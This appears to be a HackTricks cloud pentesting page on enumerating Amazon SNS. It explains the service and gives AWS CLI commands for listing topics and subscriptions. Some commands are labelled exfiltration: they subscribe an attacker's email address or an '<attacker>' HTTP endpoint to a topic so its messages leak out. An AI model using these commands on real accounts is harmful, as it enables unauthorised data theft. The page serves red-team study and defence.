Links

AWS - SNS Enum

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:

SNS

Amazon Simple Notification Service (Amazon SNS) is described as a fully managed messaging service. It supports both application-to-application (A2A) and application-to-person (A2P) communication types.
Key features for A2A communication include publish/subscribe (pub/sub) mechanisms. These mechanisms introduce topics, crucial for enabling high-throughput, push-based, many-to-many messaging. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a wide range of subscriber systems, facilitating a fanout messaging pattern.

Difference with SQS

SQS is a queue-based service that allows point-to-point communication, ensuring that messages are processed by a single consumer. It offers at-least-once delivery, supports standard and FIFO queues, and allows message retention for retries and delayed processing. On the other hand, SNS is a publish/subscribe-based service, enabling one-to-many communication by broadcasting messages to multiple subscribers simultaneously. It supports various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS, and provides filtering mechanisms for targeted message delivery. While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns.

Enumeration

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>
# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt
# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint [email protected]
# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>
Note that if the topic is of type FIFO, only subscribers using the protocol SQS can be used (HTTP or HTTPS cannot be used).
Also, even if the --topic-arn contains the region make sure you specify the correct region in --region or you will get an error that looks like indicate that you don't have access but the problem is the region.

Unauthenticated Access

Privilege Escalation

Post Exploitation

Persistence

References

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks: